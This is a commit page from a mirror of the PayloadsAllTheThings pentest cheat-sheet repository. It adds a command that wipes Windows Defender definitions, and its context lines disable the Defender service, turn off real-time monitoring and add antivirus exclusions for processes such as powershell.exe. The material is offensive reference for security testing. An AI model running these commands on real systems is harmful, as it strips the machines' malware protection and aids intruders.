ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-02-22 06:33:45 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #444 from mschader/patch-4

Browse Source 
Update Windows - Persistence.md
This commit is contained in:
Swissky 2021-10-14 09:51:35 +02:00 committed by GitHub
commit 7e18158c3b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
Methodology and Resources/Windows - Persistence.md
View File

@ -51,6 +51,10 @@ sc config WinDefend start= disabled
sc stop WinDefend sc stop WinDefend
Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference -DisableRealtimeMonitoring $true
# Wipe currently stored definitions
# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>
MpCmdRun.exe -RemoveDefinitions -All
## Exclude a process / location ## Exclude a process / location
Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe" Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'